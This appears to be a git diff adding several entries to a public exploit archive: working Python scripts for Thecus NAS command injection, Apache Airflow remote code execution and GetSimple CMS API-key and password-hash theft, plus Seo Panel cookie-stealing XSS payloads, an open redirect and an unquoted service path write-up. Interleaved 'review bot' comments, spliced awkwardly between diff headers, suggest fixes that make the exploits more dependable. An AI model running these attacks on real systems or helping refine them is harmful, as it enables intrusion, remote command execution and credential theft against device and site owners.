diff --git a/exploits/hardware/webapps/49926.py b/exploits/hardware/webapps/49926.py
new file mode 100755
index 000000000..244b06c3e
--- /dev/null
+++ b/exploits/hardware/webapps/49926.py
@@ -0,0 +1,98 @@
+# Exploit Title: Thecus N4800Eco Nas Server Control Panel - Comand Injection
+# Date: 01/06/2021
+# Exploit Author: Metin Yunus Kandemir
+# Vendor Homepage: http://www.thecus.com/
+# Software Link: http://www.thecus.com/product.php?PROD_ID=83
+# Version: N4800Eco
+# Description: https://docs.unsafe-inline.com/0day/thecus-n4800eco-nas-server-control-panel-comand-injection
+
+
+#!/usr/bin/python3
+import requests
+import sys
+import urllib3
+
+
+# To fix SSL error that occurs when the script is started.
+# 1- Open /etc/ssl/openssl.cnf file
+# At the bottom of the file:
+# [system_default_sect]
+# MinProtocol = TLSv1.2
+# CipherString = DEFAULT@SECLEVEL=2
+# 2- Set value of MinProtocol as TLSv1.0
+
+
+def readResult(s, target):
+ d = {
+ "fun": "setlog",
+ "action": "query",
+ "params": '[{"start":0,"limit":1,"catagory":"sys","level":"all"}]'
+ }
+ url = "http://" + target + "/adm/setmain.php"
+ resultReq = s.post(url, data=d, verify=False)
+ dict = resultReq.text.split()
+ print("[+] Reading system log...\n")
+ print(dict[5:8]) #change this range to read whole output of the command
+
+def delUser(s, target, command):
+ d = {
+ "action": "delete",
+ "username": "$("+command+")"
+ }
+ url = "http://" + target + "/adm/setmain.php?fun=setlocaluser"
+ delUserReq = s.post(url, data=d, allow_redirects=False, verify=False)
+
+ if 'Local User remove succeeds' in delUserReq.text:
+ print('[+] %s command was executed successfully' % command)
+ else:
+ print('[-] %s command was not executed!' %command)
+ sys.exit(1)
+ readResult(s, target)
+
+def addUser(s, target, command):
+ d = {'batch_content': '%24('+command+')%2C22222%2C9999'}
+ url = "http://" + target + "/adm/setmain.php?fun=setbatch"
+ addUserReq = s.post(url, data=d, allow_redirects=False, verify=False)
+
+ if 'Users and groups were created successfully.' in addUserReq.text:
+ print('[+] Users and groups were created successfully')
+ else:
+ print('[-] Users and groups were not created')
+ sys.exit(1)
+ delUser(s, target, command)
+
+def login(target, username, password, command=None):
+ urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+ s = requests.Session()
+ d = {
+ "&eplang": "english",
+ "p_pass": password,
+ "p_user": username,
+ "username": username,
+ "pwd": password,
+ "action": "login",
+ "option": "com_extplorer"
+ }
+ url = "http://" + target + "/adm/login.php"
+ loginReq = s.post(url, data=d, allow_redirects=False, verify=False)
+
+ if '"success":true' in loginReq.text:
+ print('[+] Authentication successful')
+ elif '"success":false' in loginReq.text:
+ print('[-] Authentication failed!')
+ sys.exit(1)
+ else:
+ print('[-] Something went wrong!')
+ sys.exit(1)
+ addUser(s, target, command)
+
+def main(args):
+ if len(args) != 5:
+ print("usage: %s targetIp:port username password command" % (args[0]))
+ print("Example 192.168.1.13:80 admin admin id")
+ sys.exit(1)
+ login(target=args[1], username=args[2], password=args[3], command=args[4])
+
+
+if __name__ == "__main__":
+ main(args=sys.argv)
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49927.py b/exploits/multiple/webapps/49927.py
new file mode 100755
index 000000000..b9b0e300f
--- /dev/null
+++ b/exploits/multiple/webapps/49927.py
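Review bot: `addUser` pre-encodes its payload as `'%24('+command+')%2C22222%2C9999'` and then passes it through `s.post(..., data=d)`, which form-encodes the value a second time, so the NAS receives `%2524(...)%252C...` unless the `setbatch` handler URL-decodes `batch_content` itself; if that double decode is what makes the injection land, a one-line comment saying so would spare the next reader a debugging session, otherwise pass the raw `'$(' + command + '),22222,9999'` and let requests encode it once. The TLS note at the top tells the operator to lower `MinProtocol` in `/etc/ssl/openssl.cnf`, which downgrades every TLS client on that machine; mounting a `requests.adapters.HTTPAdapter` with its own `ssl.SSLContext` on the session keeps the downgrade scoped to this script, and since every URL here is built as `http://`, `verify=False` and that note only matter when the target is actually reached over HTTPS. `readResult` also binds the local name `dict`, shadowing the builtin; `tokens` would do.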
@@ -0,0 +1,116 @@
+# Exploit Title: Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution
+# Date: 2021-06-02
+# Exploit Author: Pepe Berba
+# Vendor Homepage: https://airflow.apache.org/
+# Software Link: https://airflow.apache.org/docs/apache-airflow/stable/installation.html
+# Version: <= 1.10.10
+# Tested on: Docker apache/airflow:1.10 .10 (https://github.com/pberba/CVE-2020-11978/blob/main/docker-compose.yml)
+# CVE : CVE-2020-11978
+#
+# This is a proof of concept for CVE-2020-11978, a RCE vulnerability in one of the example DAGs shipped with airflow
+# This combines with CVE-2020-13927 where unauthenticated requests to Airflow's Experimental API were allowded by default.
+# Together, potentially allows unauthenticated RCE to Airflow
+#
+# Repo: https://github.com/pberba/CVE-2020-11978
+# More information can be found here:
+# https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E
+# https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E
+#
+# Remediation:
+# For CVE-2020-13927 make sure that the config `[api]auth_backend = airflow.api.auth.backend.deny_all` or has auth set.
+# For CVE-2020-11978 use 1.10.11 or set `load_examples=False` when initializing Airflow. You can also manually delete example_trigger_target_dag DAG.
+#
+# Example usage: python CVE-2020-11978.py http://127.0.0.1:8080 "touch test"
+
+import argparse
+import requests
+import sys
+import time
+
+def create_dag(url, cmd):
+ print('[+] Checking if Airflow Experimental REST API is accessible...')
+ check = requests.get('{}/api/experimental/test'.format(url))
+
+ if check.status_code == 200:
+ print('[+] /api/experimental/test returned 200' )
+ else:
+ print('[!] /api/experimental/test returned {}'.format(check.status_code))
+ print('[!] Airflow Experimental REST API not be accessible')
+ sys.exit(1)
+
+ check_task = requests.get('{}/api/experimental/dags/example_trigger_target_dag/tasks/bash_task'.format(url))
+ if check_task.status_code != 200:
+ print('[!] Failed to find the example_trigger_target_dag.bash_task')
+ print('[!] Host isn\'t vunerable to CVE-2020-11978')
+ sys.exit(1)
+ elif 'dag_run' in check_task.json()['env']:
+ print('[!] example_trigger_target_dag.bash_task is patched')
+ print('[!] Host isn\'t vunerable to CVE-2020-11978')
+ sys.exit(1)
+ print('[+] example_trigger_target_dag.bash_task is vulnerable')
+
+ unpause = requests.get('{}/api/experimental/dags/example_trigger_target_dag/paused/false'.format(url))
+ if unpause.status_code != 200:
+ print('[!] Unable to enable example_trigger_target_dag. Example dags were not loaded')
+ sys.exit(1)
+ else:
+ print('[+] example_trigger_target_dag was enabled')
+
+ print('[+] Creating new DAG...')
+ res = requests.post(
+ '{}/api/experimental/dags/example_trigger_target_dag/dag_runs'.format(url),
+ json={
+ 'conf': {
+ 'message': '"; {} #'.format(cmd)
+ }
+ }
+ )
+
+ if res.status_code == 200:
+ print('[+] Successfully created DAG')
+ print('[+] "{}"'.format(res.json()['message']))
+ else:
+ print('[!] Failed to create DAG')
+ sys.exit(1)
+
+ wait_url = '{url}/api/experimental/dags/example_trigger_target_dag/dag_runs/{execution_date}/tasks/bash_task'.format(
+ url = url,
+ execution_date=res.json()['execution_date']
+ )
+
+ start_time = time.time()
+ print('[.] Waiting for the scheduler to run the DAG... This might take a minute.')
+ print('[.] If the bash task is never queued, then the scheduler might not be running.')
+ while True:
+ time.sleep(10)
+ res = requests.get(wait_url)
+ status = res.json()['state']
+ if status == 'queued':
+ print('[.] Bash task queued...')
+ elif status == 'running':
+ print('[+] Bash task running...')
+ elif status == 'success':
+ print('[+] Bash task successfully ran')
+ break
+ elif status == 'None':
+ print('[-] Bash task is not yet queued...'.format(status))
+ else:
+ print('[!] Bash task was {}'.format(status))
+ sys.exit(1)
+
+ return 0
+
+
+def main():
+ arg_parser = argparse.ArgumentParser()
+ arg_parser.add_argument('url', type=str, help="Base URL for Airflow")
+ arg_parser.add_argument('command', type=str)
+ args = arg_parser.parse_args()
+
+ create_dag(
+ args.url,
+ args.command
+ )
+
+if __name__ == '__main__':
+ main()
\ No newline at end of file
diff --git a/exploits/php/webapps/49928.py b/exploits/php/webapps/49928.py
new file mode 100755
index 000000000..81c99a925
--- /dev/null
+++ b/exploits/php/webapps/49928.py
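Review bot: The polling loop at the end of `create_dag` is `while True:` with no upper bound, and `start_time = time.time()` just above it is assigned but never read, so a target whose scheduler never picks up the run leaves the script sleeping in ten-second steps forever; give it a deadline, e.g. `deadline = time.time() + 600` and `while time.time() < deadline:`, and exit non-zero with a message after the loop. None of the `requests.get`/`requests.post` calls carry a `timeout=`, so a half-open connection to the target blocks indefinitely as well; `timeout=30` on each call is enough for a PoC. The injected `'"; {} #'.format(cmd)` presumably closes a double-quoted argument in the example DAG's bash command, so a `cmd` containing a double quote breaks the injection silently; a note on the argparse argument, `help="Shell command to run; must not contain a double quote"`, would make that visible.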
@@ -0,0 +1,90 @@
+# Exploit Title: GetSimple CMS 3.3.4 - Information Disclosure
+# Date 01.06.2021
+# Exploit Author: Ron Jost (Hacker5preme)
+# Vendor Homepage: http://get-simple.info/
+# Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS/archive/refs/tags/v3.3.4.zip
+# Version: 3.3.4
+# CVE: CVE-2014-8722
+# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2014-8722-Exploit
+
+
+'''
+Description:
+GetSimple CMS 3.3.4 allows remote attackers to obtain sensitive information via a direct request to
+(1) data/users/.xml,
+(2) backups/users/.xml.bak,
+(3) data/other/authorization.xml, or
+(4) data/other/appid.xml.
+'''
+
+
+'''
+Import required modules:
+'''
+import sys
+import requests
+
+'''
+User-Input:
+'''
+target_ip = sys.argv[1]
+target_port = sys.argv[2]
+cmspath = sys.argv[3]
+print('')
+username = input("Do you know the username? Y/N: ")
+if username == 'Y':
+ print('')
+ username = True
+ username_string = input('Please enter the username: ')
+else:
+ print('')
+ username = False
+ print('No problem, you will still get the API key')
+
+
+'''
+Get Api-Key:
+'''
+url = 'http://' + target_ip + ':' + target_port + cmspath + '/data/other/authorization.xml'
+header = {
+ "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0",
+ "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
+ "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
+ "Accept-Encoding": "gzip, deflate",
+ "Connection": "close",
+ "Upgrade-Insecure-Requests": "1",
+ "Cache-Control": "max-age=0"
+}
+x = requests.get(url, headers=header).text
+start = x.find('[') + 7
+end = x.find(']')
+api_key = x[start:end]
+print('')
+print('Informations:')
+print('')
+print('[*] API Key: ' + api_key)
+
+
+if username:
+ '''
+ Get Email and Passwordhash:
+ '''
+ url = "http://" + target_ip + ':' + target_port + cmspath + '/data/users/' + username_string + '.xml'
+ header = {
+ "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0",
+ "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
+ "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
+ "Accept-Encoding": "gzip, deflate",
+ "Connection": "close",
+ "Upgrade-Insecure-Requests": "1",
+ "Cache-Control": "max-age=0"
+ }
+ x = requests.get(url, headers=header).text
+ start = x[x.find('PWD>'):]
+ passwordhash = start[start.find('>') +1 :start.find('<')]
+ print('[*] Hashed Password: ' + passwordhash)
+
+ start = x[x.find('EMAIL>'):]
+ email = start[start.find('>') + 1 : start.find('<')]
+ print('[*] Email: ' + email)
+print('')
\ No newline at end of file
diff --git a/exploits/php/webapps/49931.txt b/exploits/php/webapps/49931.txt
new file mode 100644
index 000000000..9fa03c832
--- /dev/null
+++ b/exploits/php/webapps/49931.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Seo Panel 4.8.0 - 'search_name' Reflected XSS
+# Date: 21-03-2021
+# Exploit Author: Piyush Patil
+# Vendor Homepage: https://www.seopanel.org/
+# Software Link: https://github.com/seopanel/Seo-Panel/releases/tag/4.8.0
+# Version: Seo Panel 4.8.0
+# Tested on: Windows 10 and Kali
+# CVE : CVE-2021-28417
+
+
+-Description:
+ A cross-site scripting (XSS) issue in the SEO admin login panel version 4.8.0 allows remote attackers to inject JavaScript via the "redirect" parameter.
+
+-Payload used:
+x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22
+
+-Steps to reproduce:
+1- Login to SEO admin panel
+2- Add below line at the end:
+http://localhost/archive.php?from_time=2021-03-08&order_col=name&order_val=DESC&report_type=website-search-reports&search_name=x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22&sec=viewWebsiteSearchSummary&to_time=2021-03-09&website_id=http%3a%2f%2fwww.example.com
+3- Hover your mouse near to "CTR" field
\ No newline at end of file
diff --git a/exploits/php/webapps/49932.txt b/exploits/php/webapps/49932.txt
new file mode 100644
index 000000000..cb4bb5713
--- /dev/null
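Review bot: Neither `requests.get(...)` has its status checked, so on a patched or differently laid-out target (a 404 or 403 page) `x.find('[')` and `x.find(']')` return -1 and `x[start:end]` slices an error page, which is then printed as `[*] API Key:`; check `r.status_code == 200` (or call `r.raise_for_status()`) before parsing, and parse the document with `xml.etree.ElementTree` instead of `x.find('[') + 7`, which only lands on the key when it sits inside a `<![CDATA[...]]>` block. `sys.argv[1]`..`[3]` are read with no length check, so a bare invocation dies with an `IndexError` rather than a usage line, and `cmspath` must start with `/` for the string concatenation to form a valid URL — a `len(sys.argv) != 4` guard with a usage message covers both. The request-header dict is duplicated verbatim for the second request; one module-level `HEADERS` constant would do.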
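Review bot: The description attributes the injection to the "redirect" parameter, but the payload in step 2 is placed in `search_name` of `archive.php`, which is also what the title says; the description should read `... allows authenticated users to inject JavaScript via the "search_name" parameter of archive.php.` Step 1 requires logging in, so this is an authenticated reflected XSS rather than an issue in the "admin login panel", and that distinction drives severity. Step 2, "Add below line at the end", is unclear — presumably it means requesting the given URL in the logged-in browser; say that.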
+++ b/exploits/php/webapps/49932.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Seo Panel 4.8.0 - 'category' Reflected XSS
+# Date: 22-03-2021
+# Exploit Author: Piyush Patil
+# Vendor Homepage: https://www.seopanel.org/
+# Software Link: https://github.com/seopanel/Seo-Panel/releases/tag/4.8.0
+# Version: Seo Panel 4.8.0
+# Tested on: Windows 10 and Kali
+# CVE : CVE-2021-28418
+
+
+-Description:
+A cross-site scripting (XSS) issue in the SEO admin login panel version 4.8.0 allows remote attackers to inject JavaScript via the "redirect" parameter.
+
+-Payload used:
+x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22
+
+-Steps to reproduce:
+1- Login to SEO admin panel
+2- Visit:
+http://localhost/settings.php?category=x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22
+3- Hover your mouse to "Cancel" field
\ No newline at end of file
diff --git a/exploits/python/webapps/49930.txt b/exploits/python/webapps/49930.txt
new file mode 100644
index 000000000..56bd197b7
--- /dev/null
+++ b/exploits/python/webapps/49930.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Products.PluggableAuthService 2.6.0 - Open Redirect
+# Exploit Author: Piyush Patil
+# Affected Component: Pluggable Zope authentication/authorization framework
+# Component Link: https://pypi.org/project/Products.PluggableAuthService/
+# Version: < 2.6.1
+# CVE: CVE-2021-21337
+# Reference: https://github.com/zopefoundation/Products.PluggableAuthService/security/advisories/GHSA-p44j-xrqg-4xrr
+
+
+--------------------------Proof of Concept-----------------------
+
+1- Goto https://localhost/login
+2- Turn on intercept and click on the login
+3- Change "came_from" parameter value to https://attacker.com
+4- User will be redirected to an attacker-controlled website.
+
+Fix: pip install "Products.PluggableAuthService>=2.6.1"
\ No newline at end of file
diff --git a/exploits/windows/local/49929.txt b/exploits/windows/local/49929.txt
new file mode 100644
index 000000000..6adee93a9
--- /dev/null
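Review bot: The description names the "redirect" parameter, but the only vector shown is `category` on `settings.php` (step 2), which is what the title and the CVE split from 49931 indicate; change it to `... allows authenticated users to inject JavaScript via the "category" parameter of settings.php.` The "admin login panel" wording is also at odds with step 1, which requires an authenticated session, so this is a post-authentication reflected XSS and should be labelled as such since it affects the severity a reader assigns.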
+++ b/exploits/windows/local/49929.txt
@@ -0,0 +1,38 @@
+# Exploit Title: Intel(R) Audio Service x64 01.00.1080.0 - 'IntelAudioService' Unquoted Service Path
+# Date: 06-01-2021
+# Exploit Author: Geovanni Ruiz
+# Vendor Homepage: https://www.intel.com
+# Software Version: 01.00.1080.0
+# File Version: 1.00.1080.0
+# Tested on: Microsoft® Windows 10 Home Single Language 10.0.19042 x64 es
+# Vulnerability Type: Unquoted Service Path
+
+
+# 1. To find the unquoted service path vulnerability
+
+C:\>wmic service where 'name like "%IntelAudioService%"' get name, displayname, pathname, startmode, startname
+
+DisplayName Name PathName StartMode StartName
+Intel(R) Audio Service IntelAudioService C:\WINDOWS\system32\cAVS\Intel(R) Audio Service\IntelAudioService.exe Auto LocalSystem
+
+
+# 2. To check service info:
+
+C:\>sc qc "IntelAudioService"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: IntelAudioService
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\WINDOWS\system32\cAVS\Intel(R) Audio Service\IntelAudioService.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Intel(R) Audio Service
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
+
+# 3. Exploit:
+
+To exploit this vulnerability an attacker requires drop a malicious executable into the service path undetected by the OS in order
+to gain SYSTEM privileges.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index cc2566b0d..f3bb35fe5 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
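Review bot: Step 3 never shows whether a non-administrative user can write to `C:\WINDOWS\system32\cAVS\` or to `C:\WINDOWS\system32\cAVS\Intel(R) Audio Service\`, and that is the whole exploitability question for an unquoted path that lives under `system32`, where the default ACLs grant write only to Administrators and TrustedInstaller. Add the `icacls "C:\WINDOWS\system32\cAVS"` output (and the parent directory's) to the write-up, and state which candidate the service control manager would try first — presumably `C:\WINDOWS\system32\cAVS\Intel(R).exe`, then `C:\WINDOWS\system32\cAVS\Intel(R) Audio.exe` — so a reader can see the planted file name. Without a writable directory on that path, "drop a malicious executable into the service path" describes a misconfiguration, not a demonstrated local privilege escalation, and the advisory should say so.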
@@ -11341,6 +11341,7 @@ id,file,description,date,author,type,platform,port
 49899,exploits/windows/local/49899.txt,"DiskBoss Service 12.2.18 - 'diskbsa.exe' Unquoted Service Path",2021-05-24,"Erick Galindo",local,windows,
 49900,exploits/windows/local/49900.txt,"ePowerSvc 6.0.3008.0 - 'ePowerSvc.exe' Unquoted Service Path",2021-05-24,"Emmanuel Lujan",local,windows,
 49925,exploits/windows/local/49925.txt,"Veyon 4.4.1 - 'VeyonService' Unquoted Service Path",2021-06-01,"Víctor García",local,windows,
+49929,exploits/windows/local/49929.txt,"Intel(R) Audio Service x64 01.00.1080.0 - 'IntelAudioService' Unquoted Service Path",2021-06-02,"Geovanni Ruiz",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -44088,3 +44089,9 @@ id,file,description,date,author,type,platform,port
 49922,exploits/cgi/webapps/49922.txt,"CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS)",2021-06-01,sirpedrotavares,webapps,cgi,
 49923,exploits/cgi/webapps/49923.txt,"CHIYU TCP/IP Converter devices - CRLF injection",2021-06-01,sirpedrotavares,webapps,cgi,
 49924,exploits/multiple/webapps/49924.py,"Atlassian Jira 8.15.0 - Information Disclosure (Username Enumeration)",2021-06-01,"Mohammed Aloraimi",webapps,multiple,
+49926,exploits/hardware/webapps/49926.py,"Thecus N4800Eco Nas Server Control Panel - Comand Injection",2021-06-02,"Metin Yunus Kandemir",webapps,hardware,
+49927,exploits/multiple/webapps/49927.py,"Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution",2021-06-02,"Pepe Berba",webapps,multiple,
+49928,exploits/php/webapps/49928.py,"GetSimple CMS 3.3.4 - Information Disclosure",2021-06-02,"Ron Jost",webapps,php,
+49930,exploits/python/webapps/49930.txt,"Products.PluggableAuthService 2.6.0 - Open Redirect",2021-06-02,"Piyush Patil",webapps,python,
+49931,exploits/php/webapps/49931.txt,"Seo Panel 4.8.0 - 'search_name' Reflected XSS",2021-06-02,"Piyush Patil",webapps,php,
+49932,exploits/php/webapps/49932.txt,"Seo Panel 4.8.0 - 'category' Reflected XSS",2021-06-02,"Piyush Patil",webapps,php,